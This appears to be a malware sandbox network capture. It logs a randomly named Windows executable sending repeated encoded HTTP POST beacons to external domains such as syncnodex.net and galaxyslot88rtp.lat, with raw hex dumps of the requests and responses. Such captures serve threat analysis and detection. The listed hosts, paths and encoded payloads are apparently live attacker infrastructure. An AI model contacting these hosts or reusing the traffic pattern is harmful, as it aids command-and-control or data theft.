                                                                                                            Oct 7, 2024 15:56:20.391271114 CEST1236INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 20 72 6f
                                                                                                            Data Ascii: <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-6.jpg" alt=""> </div> </div> </div>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.94999215.197.172.60806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:25.727608919 CEST671OUTPOST /xx1z/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.syncnodex.net
                                                                                                            Origin: http://www.syncnodex.net
                                                                                                            Referer: http://www.syncnodex.net/xx1z/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 59 53 65 62 30 34 4d 45 70 64 51 4b 51 2b 4e 7a 45 55 50 51 58 4c 2f 6c 47 31 54 4e 6a 35 66 51 68 65 7a 45 6e 38 54 35 2b 73 30 7a 50 4e 6a 71 4a 34 49 48 43 61 31 68 31 49 49 59 49 63 36 6b 49 38 48 35 70 6c 37 6b 45 35 75 2f 62 45 41 79 4c 74 36 64 65 41 47 33 30 48 39 76 72 67 70 42 7a 34 31 55 4c 37 46 71 72 77 65 4b 35 34 4d 32 58 47 66 5a 34 6e 78 4b 42 49 48 72 76 6f 6f 6b 56 63 54 79 75 64 4f 6b 63 64 57 6a 64 4d 70 33 6c 43 32 55 75 4e 73 46 7a 44 4c 51 4b 53 6e 2f 2f 43 35 61 78 62 55 4b 58 31 73 4e 75 45 6a 71 70 47 65 35 30 30 78 58 43 70 66 43
                                                                                                            Data Ascii: EjLdUJJ=YSeb04MEpdQKQ+NzEUPQXL/lG1TNj5fQhezEn8T5+s0zPNjqJ4IHCa1h1IIYIc6kI8H5pl7kE5u/bEAyLt6deAG30H9vrgpBz41UL7FqrweK54M2XGfZ4nxKBIHrvookVcTyudOkcdWjdMp3lC2UuNsFzDLQKSn//C5axbUKX1sNuEjqpGe500xXCpfC


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.94999315.197.172.60806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:28.278872967 CEST695OUTPOST /xx1z/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.syncnodex.net
                                                                                                            Origin: http://www.syncnodex.net
                                                                                                            Referer: http://www.syncnodex.net/xx1z/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 59 53 65 62 30 34 4d 45 70 64 51 4b 57 65 39 7a 43 7a 6a 51 57 72 2f 6d 61 6c 54 4e 71 5a 66 55 68 65 2f 45 6e 2f 66 70 2b 66 51 7a 42 50 37 71 49 36 67 48 42 61 31 68 36 6f 49 58 4d 63 36 2f 49 38 4b 45 70 6b 58 6b 45 35 36 2f 62 42 38 79 4c 61 75 65 65 51 47 31 79 48 39 74 76 67 70 42 7a 34 31 55 4c 37 42 55 72 77 47 4b 35 49 63 32 57 6e 66 47 32 48 78 46 47 49 48 72 72 6f 6f 67 56 63 54 51 75 59 6d 65 63 66 2b 6a 64 4e 5a 33 6b 58 61 54 6e 4e 73 44 39 6a 4b 54 47 48 53 75 78 6a 31 37 2f 72 55 71 4c 57 67 6b 67 46 44 30 34 30 58 69 68 6a 78 77 46 4f 57 71 75 58 6b 4f 6c 65 61 71 39 62 44 38 4b 37 48 67 6d 6f 63 79 6f 77 3d 3d
                                                                                                            Data Ascii: EjLdUJJ=YSeb04MEpdQKWe9zCzjQWr/malTNqZfUhe/En/fp+fQzBP7qI6gHBa1h6oIXMc6/I8KEpkXkE56/bB8yLaueeQG1yH9tvgpBz41UL7BUrwGK5Ic2WnfG2HxFGIHrroogVcTQuYmecf+jdNZ3kXaTnNsD9jKTGHSuxj17/rUqLWgkgFD040XihjxwFOWquXkOleaq9bD8K7Hgmocyow==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.94999415.197.172.60806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:31.043647051 CEST1708OUTPOST /xx1z/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.syncnodex.net
                                                                                                            Origin: http://www.syncnodex.net
                                                                                                            Referer: http://www.syncnodex.net/xx1z/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 59 53 65 62 30 34 4d 45 70 64 51 4b 57 65 39 7a 43 7a 6a 51 57 72 2f 6d 61 6c 54 4e 71 5a 66 55 68 65 2f 45 6e 2f 66 70 2b 66 59 7a 42 2b 62 71 4a 62 67 48 41 61 31 68 6b 34 49 55 4d 63 37 39 49 38 53 41 70 6b 72 30 45 37 43 2f 61 6a 45 79 4a 75 43 65 52 51 47 31 77 48 39 73 72 67 6f 42 7a 34 6b 66 4c 37 78 55 72 77 47 4b 35 4f 51 32 52 32 66 47 30 48 78 4b 42 49 47 35 76 6f 6f 59 56 63 62 71 75 59 71 4f 63 75 65 6a 64 74 4a 33 6a 6c 69 54 73 4e 73 42 77 44 4b 78 47 48 58 32 78 6a 70 42 2f 6f 49 55 4c 57 59 6b 6b 55 43 76 67 6c 2f 50 33 67 4e 73 45 74 69 2f 73 41 42 73 6c 64 54 57 73 65 44 35 4c 61 48 77 73 6f 30 38 38 56 4c 6c 76 50 57 50 47 49 4b 6e 39 53 6a 6a 47 77 38 5a 66 65 78 33 35 6a 63 71 65 68 35 58 37 38 4e 74 39 71 4c 6d 69 51 31 6b 51 36 6e 4c 43 6f 5a 4c 6e 75 73 70 39 75 4a 2b 57 6f 32 2b 78 52 43 45 78 75 74 44 46 37 68 5a 71 75 6e 37 5a 57 51 6a 78 7a 34 2b 53 31 6f 49 35 47 4e 74 78 36 68 75 45 78 38 63 49 7a 54 4d 6d 38 68 58 64 77 62 47 57 55 41 31 6c 30 [TRUNCATED]
                                                                                                            Data Ascii: EjLdUJJ=YSeb04MEpdQKWe9zCzjQWr/malTNqZfUhe/En/fp+fYzB+bqJbgHAa1hk4IUMc79I8SApkr0E7C/ajEyJuCeRQG1wH9srgoBz4kfL7xUrwGK5OQ2R2fG0HxKBIG5vooYVcbquYqOcuejdtJ3jliTsNsBwDKxGHX2xjpB/oIULWYkkUCvgl/P3gNsEti/sABsldTWseD5LaHwso088VLlvPWPGIKn9SjjGw8Zfex35jcqeh5X78Nt9qLmiQ1kQ6nLCoZLnusp9uJ+Wo2+xRCExutDF7hZqun7ZWQjxz4+S1oI5GNtx6huEx8cIzTMm8hXdwbGWUA1l0P+16RU3x18h+BXdP1Dm18AAzhm61cQ1EUGe02x7FAhdBVxF3HLURDspL516iGKXZxnRLgh/Rw/W4He8v21rDR/3FpxGMIfC95eIoCR0L8JyQ8pK4hDdsmfZtAu0xqVoPTiOc+4Tm9ZD3hnUqiuDAcVsR9KjRHBODkJwpSvSgCGL05Xk6hp1YV6Ufvd59Ew18XTJaGOe0eRj/HU0TMFWF2PdCh8QvL84kFvNNJf7zukoSq6y6ASpirFhS1hUV6LKWNzydJee5ufzKgYtWsQgLmdFxbfZg8tYtUuuX3Q44kUN9qFNEMfWnfj7Zn/Tb9mdjuSjkYdpmkbf8HDF89eT3TBQtIaA3f/lT/5qHqTCnvTWUEEiyt4HGY6h945vh8jGLXDxJZQ3yoc5XwnosmZI1kdcclhU25lqf3UDe8ed+U1tFQ3CKT+iBgbJuBEl1P1NjL0n7k+vD578Kyst0cVK77eRRI3mEdanY4fQTPFf8eIXmx1CeRefACDWXiKaFTAiLJ417ECvLqLVsAPjrE7ZoNEktQdJQ8vP9nY7sZIcq18vo8Z39dusgztAfNCz8ThFRIMWpZs0gejkDUXg0b3k5Mx0XZECKXupcUDh8WCw6X912ikwfVN8WY428/LuUax9GqqpsoRrCaT1DDbdwbfcYCbChkAZAq+PgFM [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.94999515.197.172.60806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:33.593826056 CEST413OUTGET /xx1z/?EjLdUJJ=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIRBLVhXVMqm8ByJItQpJ18i+00NseLA==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.syncnodex.net
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:56:34.021588087 CEST399INHTTP/1.1 200 OK
                                                                                                            Server: openresty
                                                                                                            Date: Mon, 07 Oct 2024 13:56:33 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 259
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 6a 4c 64 55 4a 4a 3d 56 51 32 37 33 50 6f 72 39 74 5a 4e 58 63 70 6e 42 6a 48 79 65 72 48 66 50 68 33 49 75 59 33 53 38 65 4c 32 32 2f 66 75 73 6f 35 64 42 64 50 59 4d 6f 45 57 47 65 64 36 2b 62 46 78 4f 35 43 39 4c 59 53 2f 70 79 76 75 56 4b 57 4b 55 52 51 36 5a 61 71 49 52 42 4c 56 68 58 56 4d 71 6d 38 42 79 4a 49 74 51 70 4a 31 38 69 2b 30 30 4e 73 65 4c 41 3d 3d 26 57 4c 55 44 75 3d 53 58 71 38 79 72 76 50 56 64 33 74 66 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EjLdUJJ=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIRBLVhXVMqm8ByJItQpJ18i+00NseLA==&WLUDu=SXq8yrvPVd3tf"}</script></head></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.94999646.17.172.49806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:39.587677956 CEST689OUTPOST /lbpf/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.galaxyslot88rtp.lat
                                                                                                            Origin: http://www.galaxyslot88rtp.lat
                                                                                                            Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 42 38 72 2f 76 30 50 66 5a 6d 43 5a 48 5a 46 58 79 33 74 42 77 6d 48 59 57 4f 30 62 68 62 67 2b 63 6e 54 6b 44 46 31 55 75 6a 43 46 76 66 67 71 73 78 2f 6d 63 59 73 57 59 2b 43 34 39 57 52 65 38 6e 43 71 4d 61 47 72 39 65 7a 79 53 62 42 6c 57 31 4b 78 37 2f 57 41 59 73 4c 37 5a 31 68 66 78 58 71 51 4c 65 50 47 50 34 76 2f 68 30 45 43 6a 47 74 2f 50 54 43 36 4c 77 4e 59 67 44 57 6b 4e 6c 77 4b 79 78 53 52 53 6d 68 54 46 36 39 76 45 77 4b 49 4f 53 45 4d 61 69 46 6a 5a 55 4c 46 79 54 61 6d 54 51 45 75 31 6c 33 6a 69 6d 4b 57 66 57 53 72 62 53 78 31 6f 58 6a 63
                                                                                                            Data Ascii: EjLdUJJ=B8r/v0PfZmCZHZFXy3tBwmHYWO0bhbg+cnTkDF1UujCFvfgqsx/mcYsWY+C49WRe8nCqMaGr9ezySbBlW1Kx7/WAYsL7Z1hfxXqQLePGP4v/h0ECjGt/PTC6LwNYgDWkNlwKyxSRSmhTF69vEwKIOSEMaiFjZULFyTamTQEu1l3jimKWfWSrbSx1oXjc
                                                                                                            Oct 7, 2024 15:56:40.507422924 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:40 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                            Oct 7, 2024 15:56:40.507442951 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                                                            Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.94999746.17.172.49806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:42.138916969 CEST713OUTPOST /lbpf/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.galaxyslot88rtp.lat
                                                                                                            Origin: http://www.galaxyslot88rtp.lat
                                                                                                            Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 42 38 72 2f 76 30 50 66 5a 6d 43 5a 46 35 31 58 2b 30 46 42 32 47 48 66 61 75 30 62 6f 37 67 36 63 6e 58 6b 44 45 68 45 75 51 6d 46 6f 39 34 71 74 77 2f 6d 62 59 73 57 57 65 43 78 77 32 52 56 38 6e 4f 59 4d 65 47 72 39 65 6e 79 53 61 78 6c 56 47 53 32 37 76 57 43 42 38 4c 35 57 56 68 66 78 58 71 51 4c 65 79 52 50 34 6e 2f 68 67 34 43 73 48 74 38 54 6a 43 35 62 67 4e 59 32 7a 57 34 4e 6c 78 6e 79 30 79 33 53 6b 70 54 46 34 6c 76 45 6c 71 4c 48 53 45 4b 48 53 45 69 5a 31 53 55 2b 67 6d 6f 4d 51 55 35 68 45 6d 46 68 48 71 49 4f 6b 62 77 4f 46 78 53 76 77 71 30 4d 6c 33 69 69 4a 4a 64 50 30 53 59 54 55 42 45 52 6a 36 75 4d 67 3d 3d
                                                                                                            Data Ascii: EjLdUJJ=B8r/v0PfZmCZF51X+0FB2GHfau0bo7g6cnXkDEhEuQmFo94qtw/mbYsWWeCxw2RV8nOYMeGr9enySaxlVGS27vWCB8L5WVhfxXqQLeyRP4n/hg4CsHt8TjC5bgNY2zW4Nlxny0y3SkpTF4lvElqLHSEKHSEiZ1SU+gmoMQU5hEmFhHqIOkbwOFxSvwq0Ml3iiJJdP0SYTUBERj6uMg==
                                                                                                            Oct 7, 2024 15:56:43.058789015 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:42 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                            Oct 7, 2024 15:56:43.058811903 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                                                            Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L
                                                                                                            Oct 7, 2024 15:56:44.105621099 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:42 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                            Oct 7, 2024 15:56:44.106067896 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:42 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
